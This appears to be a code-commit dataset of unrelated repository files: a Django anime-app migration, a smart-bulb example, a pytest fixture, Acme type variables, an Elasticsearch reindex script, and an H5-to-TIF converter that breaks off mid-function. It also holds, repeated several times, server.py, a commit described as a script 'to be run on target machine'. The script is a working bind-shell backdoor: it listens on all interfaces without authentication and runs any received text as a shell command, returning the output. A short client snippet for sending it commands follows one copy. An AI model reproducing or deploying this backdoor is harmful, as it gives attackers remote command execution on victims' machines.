field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
Add attributes to Anime migration
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add attributes to Anime migration<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
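For completeness, applying this migration in a checkout uses the standard Django command; the app label comes from the dependencies list above:

# From the project root of a mangaki checkout:
#   python manage.py migrate mangaki 0013_auto_20150616_0919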
|
1b3bc233591c0165df234f5f822a60017b2c8e69
|
server.py
|
server.py
|
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket):
    while True:
        request = client_socket.recv(1024)
        if not request:
            # Peer closed the connection; stop instead of looping on empty reads.
            break
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
    client_handler = threading.Thread(target = handle_client, args = (client,))
client_handler.start()
|
Add the script to be run on target machine
|
Add the script to be run on target machine
|
Python
|
mit
|
Laserbear/PypeBomb
|
Add the script to be run on target machine
|
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket):
    while True:
        request = client_socket.recv(1024)
        if not request:
            # Peer closed the connection; stop instead of looping on empty reads.
            break
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
    client_handler = threading.Thread(target = handle_client, args = (client,))
client_handler.start()
|
<commit_before><commit_msg>Add the script to be run on target machine<commit_after>
|
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket):
    while True:
        request = client_socket.recv(1024)
        if not request:
            # Peer closed the connection; stop instead of looping on empty reads.
            break
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
    client_handler = threading.Thread(target = handle_client, args = (client,))
client_handler.start()
|
Add the script to be run on target machine
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket):
    while True:
        request = client_socket.recv(1024)
        if not request:
            # Peer closed the connection; stop instead of looping on empty reads.
            break
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
    client_handler = threading.Thread(target = handle_client, args = (client,))
client_handler.start()
|
<commit_before><commit_msg>Add the script to be run on target machine<commit_after>import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket):
    while True:
        request = client_socket.recv(1024)
        if not request:
            # Peer closed the connection; stop instead of looping on empty reads.
            break
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
    client_handler = threading.Thread(target = handle_client, args = (client,))
client_handler.start()
|
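A throwaway client for exercising the listener above on localhost; the host and port match the script's defaults, and the closing "exit" line is what makes the handler's loop break:

import socket

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 9999))  # the script's default bind
client.send(b'whoami\n')             # any shell command for the server to run
print(client.recv(4096))
client.send(b'exit\n')               # handler breaks its loop on "exit"
client.close()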
|
275305e39c072bdc105c10799d5e3ea5345b2d1c
|
examples/example-bulb-hsv.py
|
examples/example-bulb-hsv.py
|
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
Add a simple HSV example
|
Add a simple HSV example
|
Python
|
mit
|
fabaff/python-mystrom
|
Add a simple HSV example
|
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
<commit_before><commit_msg>Add a simple HSV example<commit_after>
|
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
Add a simple HSV example
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
<commit_before><commit_msg>Add a simple HSV example<commit_after>"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
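A small sanity helper to pair with set_color_hsv above; the 0-359 hue and 0-100 saturation/value ranges are an assumption about the bulb's API rather than something the example states:

def clamp_hsv(hue, saturation, value):
    # Clamp HSV inputs to the assumed ranges before sending them to the bulb.
    return (max(0, min(359, hue)),
            max(0, min(100, saturation)),
            max(0, min(100, value)))

print(clamp_hsv(400, 120, 50))  # -> (359, 100, 50)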
|
2bf5d88f368b7d3de67b419d1ef12ddaa573e79d
|
tests/conftest.py
|
tests/conftest.py
|
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
Add pytest fixture for copying files to tmpdir
|
Add pytest fixture for copying files to tmpdir
|
Python
|
mit
|
ZedThree/fort_depend.py,ZedThree/fort_depend.py
|
Add pytest fixture for copying files to tmpdir
|
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
<commit_before><commit_msg>Add pytest fixture for copying files to tmpdir<commit_after>
|
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
Add pytest fixture for copying files to tmpdir
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
<commit_before><commit_msg>Add pytest fixture for copying files to tmpdir<commit_after>from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
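Example use of the fixture above: for a module tests/test_foo.py with a sibling data directory tests/test_foo/, each test receives its own copy of the data (the file name below is hypothetical):

def test_reads_sample(datadir):
    sample = datadir.join('sample.txt')  # py.path.local API from tmpdir
    assert sample.check(file=1)          # the copied data file exists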
|
db3e824660330dd504a221f033ba8af510836091
|
acme/jax/imitation_learning_types.py
|
acme/jax/imitation_learning_types.py
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
Define common TypeVars for IL/AL algorithms.
|
Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053
|
Python
|
apache-2.0
|
deepmind/acme,deepmind/acme
|
Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
<commit_before><commit_msg>Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053<commit_after>
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
<commit_before><commit_msg>Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053<commit_after># python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
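A sketch of how TypeVars like these are typically consumed: a generic class parameterized over the wrapped direct RL agent's types (the class name is illustrative, not from Acme):

from typing import Generic, TypeVar

DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')

class ImitationLearner(Generic[DirectRLNetworks, DirectRLTrainingState]):
    # Hypothetical learner generic over the underlying direct RL agent's types.
    def __init__(self, networks: DirectRLNetworks, state: DirectRLTrainingState):
        self._networks = networks
        self._state = state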
|
b97cf9b38a51d26e60257785db0b443177f35ed6
|
general/python/es_reindex.py
|
general/python/es_reindex.py
|
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
Add script to reindex indices
|
Add script to reindex indices
|
Python
|
apache-2.0
|
DHTC-Tools/logstash-confs,DHTC-Tools/logstash-confs,DHTC-Tools/logstash-confs
|
Add script to reindex indices
|
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
<commit_before><commit_msg>Add script to reindex indices<commit_after>
|
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
Add script to reindex indices
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
<commit_before><commit_msg>Add script to reindex indices<commit_after>#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
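The same helper can be driven directly from a REPL; the index names below are placeholders, and the scroll keyword matches the call in the script:

import elasticsearch
import elasticsearch.helpers

client = elasticsearch.Elasticsearch(hosts='uct2-es-door.mwt2.org')
results = elasticsearch.helpers.reindex(client, 'old-index', 'new-index', scroll='30m')
print(results)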
|
e4824f3357c6329e84e0d3f1ad206300c43d62c5
|
src/h5_to_tif_dir.py
|
src/h5_to_tif_dir.py
|
#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have a "main" dataset
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
file = sys.argv[1]
files = os.listdir(dir)
if file.endswith(".h5") or file.endswith(".hdf5"):
fn = os.path.join(dir, file)
arr = h5_to_array(fn)
write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
Include Python script to convert 3D stack into dir of tif images
|
Include Python script to convert 3D stack into dir of tif images
|
Python
|
mit
|
seung-lab/Julimaps,seung-lab/Julimaps
|
Include Python script to convert 3D stack into dir of tif images
|
#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have a "main" dataset
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
    dir = sys.argv[1]
    # Walk the given directory and convert every H5 file it contains
    for file in os.listdir(dir):
        if file.endswith(".h5") or file.endswith(".hdf5"):
            fn = os.path.join(dir, file)
            arr = h5_to_array(fn)
            write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Include Python script to convert 3D stack into dir of tif images<commit_after>
|
#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
    dir = sys.argv[1]
    # Walk the given directory and convert every H5 file it contains
    for file in os.listdir(dir):
